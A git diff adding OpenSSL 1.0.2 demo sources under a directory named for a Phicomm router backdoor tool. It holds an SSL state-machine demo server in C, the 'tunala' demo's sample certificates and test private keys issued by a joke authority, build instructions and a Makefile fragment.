+void SSLStateMachine_read_inject(SSLStateMachine * pMachine,
+                                 const unsigned char *aucBuf, int nBuf)
+{
+    int n = BIO_write(pMachine->pbioRead, aucBuf, nBuf);
+    /*
+     * If it turns out this assert fails, then buffer the data here and just
+     * feed it in in churn instead. Seems to me that it should be guaranteed
+     * to succeed, though.
+     */
+    assert(n == nBuf);
+    fprintf(stderr, "%d bytes of encrypted data fed to state machine\n", n);
+}
+
+int SSLStateMachine_read_extract(SSLStateMachine * pMachine,
+                                 unsigned char *aucBuf, int nBuf)
+{
+    int n;
+
+    if (!SSL_is_init_finished(pMachine->pSSL)) {
+        fprintf(stderr, "Doing SSL_accept\n");
+        n = SSL_accept(pMachine->pSSL);
+        if (n == 0)
+            fprintf(stderr, "SSL_accept returned zero\n");
+        if (n < 0) {
+            int err;
+
+            if ((err =
+                 SSL_get_error(pMachine->pSSL, n)) == SSL_ERROR_WANT_READ) {
+                fprintf(stderr, "SSL_accept wants more data\n");
+                return 0;
+            }
+
+            SSLStateMachine_print_error(pMachine, "SSL_accept error");
+            exit(7);
+        }
+        return 0;
+    }
+
+    n = SSL_read(pMachine->pSSL, aucBuf, nBuf);
+    if (n < 0) {
+        int err = SSL_get_error(pMachine->pSSL, n);
+
+        if (err == SSL_ERROR_WANT_READ) {
+            fprintf(stderr, "SSL_read wants more data\n");
+            return 0;
+        }
+
+        SSLStateMachine_print_error(pMachine, "SSL_read error");
+        exit(8);
+    }
+
+    fprintf(stderr, "%d bytes of decrypted data read from state machine\n",
+            n);
+    return n;
+}
+
+int SSLStateMachine_write_can_extract(SSLStateMachine * pMachine)
+{
+    int n = BIO_pending(pMachine->pbioWrite);
+    if (n)
+        fprintf(stderr, "There is encrypted data available to write\n");
+    else
+        fprintf(stderr, "There is no encrypted data available to write\n");
+
+    return n;
+}
+
+int SSLStateMachine_write_extract(SSLStateMachine * pMachine,
+                                  unsigned char *aucBuf, int nBuf)
+{
+    int n;
+
+    n = BIO_read(pMachine->pbioWrite, aucBuf, nBuf);
+    fprintf(stderr, "%d bytes of encrypted data read from state machine\n",
+            n);
+    return n;
+}
+
+void SSLStateMachine_write_inject(SSLStateMachine * pMachine,
+                                  const unsigned char *aucBuf, int nBuf)
+{
+    int n = SSL_write(pMachine->pSSL, aucBuf, nBuf);
+    /*
+     * If it turns out this assert fails, then buffer the data here and just
+     * feed it in in churn instead. Seems to me that it should be guaranteed
+     * to succeed, though.
+     */
+    assert(n == nBuf);
+    fprintf(stderr, "%d bytes of unencrypted data fed to state machine\n", n);
+}
+
+int OpenSocket(int nPort)
+{
+    int nSocket;
+    struct sockaddr_in saServer;
+    struct sockaddr_in saClient;
+    int one = 1;
+    int nSize;
+    int nFD;
+    int nLen;
+
+    nSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (nSocket < 0) {
+        perror("socket");
+        exit(1);
+    }
+
+    if (setsockopt
+        (nSocket, SOL_SOCKET, SO_REUSEADDR, (char *)&one, sizeof one) < 0) {
+        perror("setsockopt");
+        exit(2);
+    }
+
+    memset(&saServer, 0, sizeof saServer);
+    saServer.sin_family = AF_INET;
+    saServer.sin_port = htons(nPort);
+    nSize = sizeof saServer;
+    if (bind(nSocket, (struct sockaddr *)&saServer, nSize) < 0) {
+        perror("bind");
+        exit(3);
+    }
+
+    if (listen(nSocket, 512) < 0) {
+        perror("listen");
+        exit(4);
+    }
+
+    nLen = sizeof saClient;
+    nFD = accept(nSocket, (struct sockaddr *)&saClient, &nLen);
+    if (nFD < 0) {
+        perror("accept");
+        exit(5);
+    }
+
+    fprintf(stderr, "Incoming accepted on port %d\n", nPort);
+
+    return nFD;
+}
+
+int main(int argc, char **argv)
+{
+    SSLStateMachine *pMachine;
+    int nPort;
+    int nFD;
+    const char *szCertificateFile;
+    const char *szKeyFile;
+    char rbuf[1];
+    int nrbuf = 0;
+
+    if (argc != 4) {
+        fprintf(stderr, "%s <port> <certificate file> <key file>\n", argv[0]);
+        exit(6);
+    }
+
+    nPort = atoi(argv[1]);
+    szCertificateFile = argv[2];
+    szKeyFile = argv[3];
+
+    SSL_library_init();
+    OpenSSL_add_ssl_algorithms();
+    SSL_load_error_strings();
+    ERR_load_crypto_strings();
+
+    nFD = OpenSocket(nPort);
+
+    pMachine = SSLStateMachine_new(szCertificateFile, szKeyFile);
+
+    for (;;) {
+        fd_set rfds, wfds;
+        unsigned char buf[1024];
+        int n;
+
+        FD_ZERO(&rfds);
+        FD_ZERO(&wfds);
+
+        /* Select socket for input */
+        FD_SET(nFD, &rfds);
+
+        /* check whether there's decrypted data */
+        if (!nrbuf)
+            nrbuf = SSLStateMachine_read_extract(pMachine, rbuf, 1);
+
+        /* if there's decrypted data, check whether we can write it */
+        if (nrbuf)
+            FD_SET(1, &wfds);
+
+        /* Select socket for output */
+        if (SSLStateMachine_write_can_extract(pMachine))
+            FD_SET(nFD, &wfds);
+
+        /* Select stdin for input */
+        FD_SET(0, &rfds);
+
+        /* Wait for something to do something */
+        n = select(nFD + 1, &rfds, &wfds, NULL, NULL);
+        assert(n > 0);
+
+        /* Socket is ready for input */
+        if (FD_ISSET(nFD, &rfds)) {
+            n = read(nFD, buf, sizeof buf);
+            if (n == 0) {
+                fprintf(stderr, "Got EOF on socket\n");
+                exit(0);
+            }
+            assert(n > 0);
+
+            SSLStateMachine_read_inject(pMachine, buf, n);
+        }
+
+        /* stdout is ready for output (and hence we have some to send it) */
+        if (FD_ISSET(1, &wfds)) {
+            assert(nrbuf == 1);
+            buf[0] = rbuf[0];
+            nrbuf = 0;
+
+            n = SSLStateMachine_read_extract(pMachine, buf + 1,
+                                             sizeof buf - 1);
+            if (n < 0) {
+                SSLStateMachine_print_error(pMachine, "read extract failed");
+                break;
+            }
+            assert(n >= 0);
+            ++n;
+            if (n > 0) {        /* FIXME: has to be true now */
+                int w;
+
+                w = write(1, buf, n);
+                /* FIXME: we should push back any unwritten data */
+                assert(w == n);
+            }
+        }
+
+        /*
+         * Socket is ready for output (and therefore we have output to send)
+         */
+        if (FD_ISSET(nFD, &wfds)) {
+            int w;
+
+            n = SSLStateMachine_write_extract(pMachine, buf, sizeof buf);
+            assert(n > 0);
+
+            w = write(nFD, buf, n);
+            /* FIXME: we should push back any unwritten data */
+            assert(w == n);
+        }
+
+        /* Stdin is ready for input */
+        if (FD_ISSET(0, &rfds)) {
+            n = read(0, buf, sizeof buf);
+            if (n == 0) {
+                fprintf(stderr, "Got EOF on stdin\n");
+                exit(0);
+            }
+            assert(n > 0);
+
+            SSLStateMachine_write_inject(pMachine, buf, n);
+        }
+    }
+    /* not reached */
+    return 0;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/A-client.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/A-client.pem
new file mode 100644
index 0000000..a4caf6e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/A-client.pem
@@ -0,0 +1,84 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 2 (0x2)
+        Signature Algorithm: md5WithRSAEncryption
+        Issuer: C=NZ, L=Wellington, O=Really Irresponsible Authorisation Authority (RIAA), OU=Cert-stamping, CN=Jackov al-Trades/Email=none@fake.domain
+        Validity
+            Not Before: Jan 16 05:19:30 2002 GMT
+            Not After : Jan 14 05:19:30 2012 GMT
+        Subject: C=NZ, L=Auckland, O=Mordor, OU=SSL grunt things, CN=tunala-client/Email=client@fake.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (1024 bit)
+                Modulus (1024 bit):
+                    00:b0:d3:56:5c:c8:7f:fb:f4:95:9d:04:84:4f:82:
+                    b7:a2:75:5c:81:48:8c:56:5d:52:ee:38:e1:5c:c8:
+                    9a:70:8e:72:f2:00:1c:17:ef:df:b7:06:59:82:04:
+                    f1:f6:49:11:12:a6:4d:cb:1e:ed:ac:59:1c:4a:d0:
+                    3d:de:e6:f2:8d:cd:39:c2:0f:e0:46:2f:db:cb:9f:
+                    47:f7:56:e7:f8:16:5f:68:71:fb:3a:e3:ab:d2:e5:
+                    05:b7:da:65:61:fe:6d:30:e4:12:a8:b5:c1:71:24:
+                    6b:aa:80:05:41:17:a0:8b:6e:8b:e6:04:cf:85:7b:
+                    2a:ac:a1:79:7d:f4:96:6e:77
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Comment: 
+                OpenSSL Generated Certificate
+            X509v3 Subject Key Identifier: 
+                F8:43:CB:4F:4D:4F:BC:6E:52:1A:FD:F9:7B:E1:12:3F:A7:A3:BA:93
+            X509v3 Authority Key Identifier: 
+                keyid:49:FB:45:72:12:C4:CC:E1:45:A1:D3:08:9E:95:C4:2C:6D:55:3F:17
+                DirName:/C=NZ/L=Wellington/O=Really Irresponsible Authorisation Authority (RIAA)/OU=Cert-stamping/CN=Jackov al-Trades/Email=none@fake.domain
+                serial:00
+
+    Signature Algorithm: md5WithRSAEncryption
+        8f:5f:0e:43:da:9d:61:43:7e:03:38:9a:e6:50:9d:42:e8:95:
+        34:49:75:ec:04:8d:5c:85:99:94:70:a0:e7:1f:1e:a0:8b:0f:
+        d6:e2:cb:f7:35:d9:96:72:bd:a6:e9:8d:4e:b1:e2:ac:97:7f:
+        2f:70:01:9d:aa:04:bc:d4:01:2b:63:77:a5:de:63:3c:a8:f5:
+        f2:72:af:ec:11:12:c0:d4:70:cf:71:a6:fb:e9:1d:b3:27:07:
+        aa:f2:b1:f3:87:d6:ab:8b:ce:c2:08:1b:3c:f9:ba:ff:77:71:
+        86:09:ef:9e:4e:04:06:63:44:e9:93:20:90:c7:2d:50:c6:50:
+        f8:66
+-----BEGIN CERTIFICATE-----
+MIID9TCCA16gAwIBAgIBAjANBgkqhkiG9w0BAQQFADCBtDELMAkGA1UEBhMCTlox
+EzARBgNVBAcTCldlbGxpbmd0b24xPDA6BgNVBAoTM1JlYWxseSBJcnJlc3BvbnNp
+YmxlIEF1dGhvcmlzYXRpb24gQXV0aG9yaXR5IChSSUFBKTEWMBQGA1UECxMNQ2Vy
+dC1zdGFtcGluZzEZMBcGA1UEAxMQSmFja292IGFsLVRyYWRlczEfMB0GCSqGSIb3
+DQEJARYQbm9uZUBmYWtlLmRvbWFpbjAeFw0wMjAxMTYwNTE5MzBaFw0xMjAxMTQw
+NTE5MzBaMIGHMQswCQYDVQQGEwJOWjERMA8GA1UEBxMIQXVja2xhbmQxDzANBgNV
+BAoTBk1vcmRvcjEZMBcGA1UECxMQU1NMIGdydW50IHRoaW5nczEWMBQGA1UEAxMN
+dHVuYWxhLWNsaWVudDEhMB8GCSqGSIb3DQEJARYSY2xpZW50QGZha2UuZG9tYWlu
+MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCw01ZcyH/79JWdBIRPgreidVyB
+SIxWXVLuOOFcyJpwjnLyABwX79+3BlmCBPH2SRESpk3LHu2sWRxK0D3e5vKNzTnC
+D+BGL9vLn0f3Vuf4Fl9ocfs646vS5QW32mVh/m0w5BKotcFxJGuqgAVBF6CLbovm
+BM+FeyqsoXl99JZudwIDAQABo4IBQDCCATwwCQYDVR0TBAIwADAsBglghkgBhvhC
+AQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0OBBYEFPhD
+y09NT7xuUhr9+XvhEj+no7qTMIHhBgNVHSMEgdkwgdaAFEn7RXISxMzhRaHTCJ6V
+xCxtVT8XoYG6pIG3MIG0MQswCQYDVQQGEwJOWjETMBEGA1UEBxMKV2VsbGluZ3Rv
+bjE8MDoGA1UEChMzUmVhbGx5IElycmVzcG9uc2libGUgQXV0aG9yaXNhdGlvbiBB
+dXRob3JpdHkgKFJJQUEpMRYwFAYDVQQLEw1DZXJ0LXN0YW1waW5nMRkwFwYDVQQD
+ExBKYWNrb3YgYWwtVHJhZGVzMR8wHQYJKoZIhvcNAQkBFhBub25lQGZha2UuZG9t
+YWluggEAMA0GCSqGSIb3DQEBBAUAA4GBAI9fDkPanWFDfgM4muZQnULolTRJdewE
+jVyFmZRwoOcfHqCLD9biy/c12ZZyvabpjU6x4qyXfy9wAZ2qBLzUAStjd6XeYzyo
+9fJyr+wREsDUcM9xpvvpHbMnB6rysfOH1quLzsIIGzz5uv93cYYJ755OBAZjROmT
+IJDHLVDGUPhm
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXgIBAAKBgQCw01ZcyH/79JWdBIRPgreidVyBSIxWXVLuOOFcyJpwjnLyABwX
+79+3BlmCBPH2SRESpk3LHu2sWRxK0D3e5vKNzTnCD+BGL9vLn0f3Vuf4Fl9ocfs6
+46vS5QW32mVh/m0w5BKotcFxJGuqgAVBF6CLbovmBM+FeyqsoXl99JZudwIDAQAB
+AoGAU4chbqbPvkclPYzaq2yGLlneHrwUft+KwzlfS6L/QVgo+CQRIUWQmjaHpaGM
+YtjVFcg1S1QK1bUqZjTEZT0XKhfbYmqW8yYTfbcDEbnY7esoYlvIlW8qRlPRlTBE
+utKrtZafmVhLgoNawYGD0aLZofPqpYjbGUlrC7nrem2vNJECQQDVLD3Qb+OlEMET
+73ApnJhYsK3e+G2LTrtjrS8y5zS4+Xv61XUqvdV7ogzRl0tpvSAmMOItVyoYadkB
+S3xSIWX9AkEA1Fm1FhkQSZwGG5rf4c6gMN71jJ6JE3/kocdVa0sUjRevIupo4XQ2
+Vkykxi84MRP8cfHqyjewq7Ozv3op2MGWgwJBAKemsb66IJjzAkaBav7u70nhOf0/
++Dc1Zl7QF2y7NVW8sGrnccx5m+ot2lMD4AV6/kvK6jaqdKrapBZGnbGiHqkCQQDI
+T1r33mqz1R8Z2S2Jtzz6/McKf930a/dC+GLGVEutkILf39lRmytKmv/wB0jtWtoO
+rlJ5sLDSNzC+1cE1u997AkEAu3IrtGmLKiuS6kDj6W47m+iiTIsuSJtTJb1SbUaK
+fIoBNFxbvJYW6rUU9+PxpMRaEhzh5s24/jBOE+mlb17mRQ==
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/A-server.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/A-server.pem
new file mode 100644
index 0000000..e9f37b1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/A-server.pem
@@ -0,0 +1,84 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 1 (0x1)
+        Signature Algorithm: md5WithRSAEncryption
+        Issuer: C=NZ, L=Wellington, O=Really Irresponsible Authorisation Authority (RIAA), OU=Cert-stamping, CN=Jackov al-Trades/Email=none@fake.domain
+        Validity
+            Not Before: Jan 16 05:14:06 2002 GMT
+            Not After : Jan 14 05:14:06 2012 GMT
+        Subject: C=NZ, L=Wellington, O=Middle Earth, OU=SSL dev things, CN=tunala-server/Email=server@fake.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+            RSA Public Key: (1024 bit)
+                Modulus (1024 bit):
+                    00:a9:3e:62:87:97:13:6b:de:8f:bc:1d:0a:3f:65:
+                    0c:f9:76:a3:53:ce:97:30:27:0d:c6:df:72:1f:8d:
+                    5a:ce:58:23:6a:65:e5:e3:72:1a:8d:7f:fe:90:01:
+                    ea:42:f1:9f:6e:7b:0a:bd:eb:52:15:7b:f4:3d:9c:
+                    4e:db:74:29:2b:d1:81:9d:b9:9e:18:2b:87:e1:da:
+                    50:20:3c:59:6c:c9:83:3e:2c:11:0b:78:1e:03:f4:
+                    56:3a:db:95:6a:75:33:85:a9:7b:cc:3c:4a:67:96:
+                    f2:24:b2:a0:cb:2e:cc:52:18:16:6f:44:d9:29:64:
+                    07:2e:fb:56:cc:7c:dc:a2:d7
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Comment: 
+                OpenSSL Generated Certificate
+            X509v3 Subject Key Identifier: 
+                70:AC:7A:B5:6E:97:C2:82:AF:11:9E:32:CB:8D:48:49:93:B7:DC:22
+            X509v3 Authority Key Identifier: 
+                keyid:49:FB:45:72:12:C4:CC:E1:45:A1:D3:08:9E:95:C4:2C:6D:55:3F:17
+                DirName:/C=NZ/L=Wellington/O=Really Irresponsible Authorisation Authority (RIAA)/OU=Cert-stamping/CN=Jackov al-Trades/Email=none@fake.domain
+                serial:00
+
+    Signature Algorithm: md5WithRSAEncryption
+        2e:cb:a3:cd:6d:a8:9d:d1:dc:e5:f0:e0:27:7e:4b:5a:90:a8:
+        85:43:f0:05:f7:04:43:d7:5f:d1:a5:8f:5c:58:eb:fc:da:c6:
+        7c:e0:0b:2b:98:72:95:f6:79:48:96:7a:fa:0c:6b:09:ec:c6:
+        8c:91:74:45:9f:8f:0f:16:78:e3:66:14:fa:1e:f4:f0:23:ec:
+        cd:a9:52:77:20:4d:c5:05:2c:52:b6:7b:f3:42:33:fd:90:1f:
+        3e:88:6f:9b:23:61:c8:80:3b:e6:57:84:2e:f7:26:c7:35:ed:
+        00:8b:08:30:9b:aa:21:83:b6:6d:b8:7c:8a:9b:2a:ef:79:3d:
+        96:31
+-----BEGIN CERTIFICATE-----
+MIID+zCCA2SgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBtDELMAkGA1UEBhMCTlox
+EzARBgNVBAcTCldlbGxpbmd0b24xPDA6BgNVBAoTM1JlYWxseSBJcnJlc3BvbnNp
+YmxlIEF1dGhvcmlzYXRpb24gQXV0aG9yaXR5IChSSUFBKTEWMBQGA1UECxMNQ2Vy
+dC1zdGFtcGluZzEZMBcGA1UEAxMQSmFja292IGFsLVRyYWRlczEfMB0GCSqGSIb3
+DQEJARYQbm9uZUBmYWtlLmRvbWFpbjAeFw0wMjAxMTYwNTE0MDZaFw0xMjAxMTQw
+NTE0MDZaMIGNMQswCQYDVQQGEwJOWjETMBEGA1UEBxMKV2VsbGluZ3RvbjEVMBMG
+A1UEChMMTWlkZGxlIEVhcnRoMRcwFQYDVQQLEw5TU0wgZGV2IHRoaW5nczEWMBQG
+A1UEAxMNdHVuYWxhLXNlcnZlcjEhMB8GCSqGSIb3DQEJARYSc2VydmVyQGZha2Uu
+ZG9tYWluMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCpPmKHlxNr3o+8HQo/
+ZQz5dqNTzpcwJw3G33IfjVrOWCNqZeXjchqNf/6QAepC8Z9uewq961IVe/Q9nE7b
+dCkr0YGduZ4YK4fh2lAgPFlsyYM+LBELeB4D9FY625VqdTOFqXvMPEpnlvIksqDL
+LsxSGBZvRNkpZAcu+1bMfNyi1wIDAQABo4IBQDCCATwwCQYDVR0TBAIwADAsBglg
+hkgBhvhCAQ0EHxYdT3BlblNTTCBHZW5lcmF0ZWQgQ2VydGlmaWNhdGUwHQYDVR0O
+BBYEFHCserVul8KCrxGeMsuNSEmTt9wiMIHhBgNVHSMEgdkwgdaAFEn7RXISxMzh
+RaHTCJ6VxCxtVT8XoYG6pIG3MIG0MQswCQYDVQQGEwJOWjETMBEGA1UEBxMKV2Vs
+bGluZ3RvbjE8MDoGA1UEChMzUmVhbGx5IElycmVzcG9uc2libGUgQXV0aG9yaXNh
+dGlvbiBBdXRob3JpdHkgKFJJQUEpMRYwFAYDVQQLEw1DZXJ0LXN0YW1waW5nMRkw
+FwYDVQQDExBKYWNrb3YgYWwtVHJhZGVzMR8wHQYJKoZIhvcNAQkBFhBub25lQGZh
+a2UuZG9tYWluggEAMA0GCSqGSIb3DQEBBAUAA4GBAC7Lo81tqJ3R3OXw4Cd+S1qQ
+qIVD8AX3BEPXX9Glj1xY6/zaxnzgCyuYcpX2eUiWevoMawnsxoyRdEWfjw8WeONm
+FPoe9PAj7M2pUncgTcUFLFK2e/NCM/2QHz6Ib5sjYciAO+ZXhC73Jsc17QCLCDCb
+qiGDtm24fIqbKu95PZYx
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQCpPmKHlxNr3o+8HQo/ZQz5dqNTzpcwJw3G33IfjVrOWCNqZeXj
+chqNf/6QAepC8Z9uewq961IVe/Q9nE7bdCkr0YGduZ4YK4fh2lAgPFlsyYM+LBEL
+eB4D9FY625VqdTOFqXvMPEpnlvIksqDLLsxSGBZvRNkpZAcu+1bMfNyi1wIDAQAB
+AoGANCwqHZhiAU/TyW6+WPqivEhpYw19p/dyFMuPF9DwnEmpaUROUQY8z0AUznn4
+qHhp6Jn/nrprTHowucl0ucweYIYVxZoUiUDFpxdFUbzMdFvo6HcyV1Pe4Rt81HaY
+KYWrTZ6PaPtN65hLms8NhPEdGcGAFlY1owYv4QNGq2bU1JECQQDd32LM0NSfyGmK
+4ziajqGcvzK9NO2XyV/nJsGlJZNgMh2zm1t7yR28l/6Q2uyU49cCN+2aYULZCAfs
+taNvxBspAkEAw0alNub+xj2AVQvaxOB1sGfKzsJjHCzKIxUXn/tJi3j0+2asmkBZ
+Umx1MWr9jKQBnCMciCRUbnMEZiElOxCN/wJAfAeQl6Z19gx206lJzzzEo3dOye54
+k02DSxijT8q9pBzf9bN3ZK987BybtiZr8p+bZiYVsSOF1wViSLURdD1QYQJAIaMU
+qH1n24wShBPTrmAfxbBLTgxL+Dl65Eoo1KT7iSvfv0JzbuqwuDL4iPeuD0DdCiE+
+M/FWHeRwGIuTFzaFzwJBANKwx0jZS/h093w9g0Clw6UzeA1P5VcAt9y+qMC9hO3c
+4KXwIxQAt9yRaFLpiIR9do5bjjKNnMguf3aO/XRSDQM=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/CA.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/CA.pem
new file mode 100644
index 0000000..7a55b54
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/CA.pem
@@ -0,0 +1,24 @@
+-----BEGIN CERTIFICATE-----
+MIID9zCCA2CgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBtDELMAkGA1UEBhMCTlox
+EzARBgNVBAcTCldlbGxpbmd0b24xPDA6BgNVBAoTM1JlYWxseSBJcnJlc3BvbnNp
+YmxlIEF1dGhvcmlzYXRpb24gQXV0aG9yaXR5IChSSUFBKTEWMBQGA1UECxMNQ2Vy
+dC1zdGFtcGluZzEZMBcGA1UEAxMQSmFja292IGFsLVRyYWRlczEfMB0GCSqGSIb3
+DQEJARYQbm9uZUBmYWtlLmRvbWFpbjAeFw0wMjAxMTYwNTA5NTlaFw0xMjAxMTQw
+NTA5NTlaMIG0MQswCQYDVQQGEwJOWjETMBEGA1UEBxMKV2VsbGluZ3RvbjE8MDoG
+A1UEChMzUmVhbGx5IElycmVzcG9uc2libGUgQXV0aG9yaXNhdGlvbiBBdXRob3Jp
+dHkgKFJJQUEpMRYwFAYDVQQLEw1DZXJ0LXN0YW1waW5nMRkwFwYDVQQDExBKYWNr
+b3YgYWwtVHJhZGVzMR8wHQYJKoZIhvcNAQkBFhBub25lQGZha2UuZG9tYWluMIGf
+MA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC7QdDfFIrJn3X24hKmpkyk3TG0Ivxd
+K2wWmDPXq1wjr8lUTwrA6hM5Ba9N36jLieWpXhviLOWu9DBza5GmtgCuXloATKTC
+94xOdKHlciTVujG3wDlLDB5e710Kar84nnj6VueL1RyZ0bmP5PANa4mbGW9Tqc7J
+CkBTTW2y9d0SgQIDAQABo4IBFTCCAREwHQYDVR0OBBYEFEn7RXISxMzhRaHTCJ6V
+xCxtVT8XMIHhBgNVHSMEgdkwgdaAFEn7RXISxMzhRaHTCJ6VxCxtVT8XoYG6pIG3
+MIG0MQswCQYDVQQGEwJOWjETMBEGA1UEBxMKV2VsbGluZ3RvbjE8MDoGA1UEChMz
+UmVhbGx5IElycmVzcG9uc2libGUgQXV0aG9yaXNhdGlvbiBBdXRob3JpdHkgKFJJ
+QUEpMRYwFAYDVQQLEw1DZXJ0LXN0YW1waW5nMRkwFwYDVQQDExBKYWNrb3YgYWwt
+VHJhZGVzMR8wHQYJKoZIhvcNAQkBFhBub25lQGZha2UuZG9tYWluggEAMAwGA1Ud
+EwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEAYQo95V/NY+eKxYxkhibZiUQygph+
+gTfgbDG20MsnH6+8//w5ArHauFCgDrf0P2VyACgq+N4pBTWFGaAaLwbjKy9HCe2E
+j9C91tO1CqDS4MJkDB5AP13FTkK6fP1ZCiTQranOAp3DlGWTTWsFVyW5kVfQ9diS
+ZOyJZ9Fit5XM2X0=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/INSTALL b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/INSTALL
new file mode 100644
index 0000000..a65bbeb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/INSTALL
@@ -0,0 +1,107 @@
+There are two ways to build this code;
+
+(1) Manually
+
+(2) Using all-singing all-dancing (all-confusing) autotools, ie. autoconf,
+automake, and their little friends (autoheader, etc).
+
+=================
+Building Manually
+=================
+
+There is a basic "Makefile" in this directory that gets moved out of the way and
+ignored when building with autoconf et al. This Makefile is suitable for
+building tunala on Linux using gcc. Any other platform probably requires some
+tweaking. Here are the various bits you might need to do if you want to build
+this way and the default Makefile isn't sufficient;
+
+* Compiler: Edit the "CC" definition in Makefile
+
+* Headers, features: tunala.h controls what happens in the non-autoconf world.
+  It, by default, assumes the system has *everything* (except autoconf's
+  "config.h") so if a target system is missing something it must define the
+  appropriate "NO_***" symbols in CFLAGS. These include;
+
+  - NO_HAVE_UNISTD_H, NO_HAVE_FCNTL_H, NO_HAVE_LIMITS_H
+    Indicates the compiling system doesn't have (or need) these header files.
+  - NO_HAVE_STRSTR, NO_HAVE_STRTOUL
+    Indicates the compiling system doesn't have these functions. Replacements
+    are compiled and used in breakage.c
+  - NO_HAVE_SELECT, NO_HAVE_SOCKET
+    Pointless symbols - these indicate select() and/or socket() are missing in
+    which case the program won't compile anyway.
+
+  If you want to specify any of these, add them with "-D" prefixed to each in
+  the CFLAGS definition in Makefile.
+
+* Compilation flags: edit DEBUG_FLAGS and/or CFLAGS directly to control the
+  flags passed to the compiler. This can also be used to change the degree of
+  optimisation.
+
+* Linker flags: some systems (eg. Solaris) require extra linker flags such as;
+  -ldl, -lsocket, -lnsl, etc. If unsure, bring up the man page for whichever
+  function is "undefined" when the linker fails - that usually indicates what
+  you need to add. Make changes to the LINK_FLAGS symbol.
+
+* Linker command: if a different linker syntax or even a different program is
+  required to link, edit the linker line directly in the "tunala:" target
+  definition - it currently assumes the "CC" (compiler) program is used to link.
+
+======================
+Building Automagically
+======================
+
+Automagic building is handled courtesy of autoconf, automake, etc. There are in
+fact two steps required to build, and only the first has to be done on a system
+with these tools installed (and if I was prepared to bloat out the CVS
+repository, I could store these extra files, but I'm not).
+
+First step: "autogunk.sh"
+-------------------------
+
+The "./autogunk.sh" script will call all the necessary autotool commands to
+create missing files and run automake and autoconf. The result is that a
+"./configure" script should be generated and a "Makefile.in" generated from the
+supplied "Makefile.am". NB: This script also moves the "manual" Makefile (see
+above) out of the way and calls it "Makefile.plain" - the "ungunk" script
+reverses this to leave the directory it was previously.
+
+Once "ungunk" has been run, the resulting directory should be able to build on
+other systems without autoconf, automake, or libtool. Which is what the second
+step describes;
+
+Second step: "./configure"
+--------------------------
+
+The second step is to run the generated "./configure" script to create a
+config.h header for your system and to generate a "Makefile" (generated from
+"Makefile.in") tweaked to compile on your system. This is the standard sort of
+thing you see in GNU packages, for example, and the standard tricks also work.
+Eg. to override "configure"'s choice of compiler, set the CC environment
+variable prior to running configure, eg.
+
+    CC=gcc ./configure
+
+would cause "gcc" to be used even if there is an otherwise preferable (to
+autoconf) native compiler on your system.
+
+After this run "make" and it should build the "tunala" executable.
+
+Notes
+-----
+
+- Some versions of autoconf (or automake?) generate a Makefile syntax that gives
+  trouble to some "make" programs on some systems (eg. OpenBSD). If this
+  happens, either build 'Manually' (see above) or use "gmake" instead of "make".
+  I don't like this either but like even less the idea of sifting into all the
+  script magic crud that's involved.
+
+- On a solaris system I tried, the "configure" script specified some broken
+  compiler flags in the resulting Makefile that don't even get echoed to
+  stdout/err when the error happens (evil!). If this happens, go into the
+  generated Makefile, find the two affected targets ("%.o:" and "%.lo"), and
+  remove the offending hidden option in the $(COMPILE) line all the sludge after
+  the two first lines of script (ie. after the "echo" and the "COMPILE" lines).
+  NB: This will probably only function if "--disable-shared" was used, otherwise
+  who knows what would result ...
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/Makefile
new file mode 100644
index 0000000..bef1704
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/Makefile
@@ -0,0 +1,41 @@
+# Edit these to suit
+#
+# Oh yeah, and please read the README too.
+
+
+SSL_HOMEDIR=../..
+SSL_INCLUDEDIR=$(SSL_HOMEDIR)/include
+SSL_LIBDIR=$(SSL_HOMEDIR)
+
+RM=rm -f
+CC=gcc
+DEBUG_FLAGS=-g -ggdb3 -Wall -Wshadow
+INCLUDE_FLAGS=-I$(SSL_INCLUDEDIR)
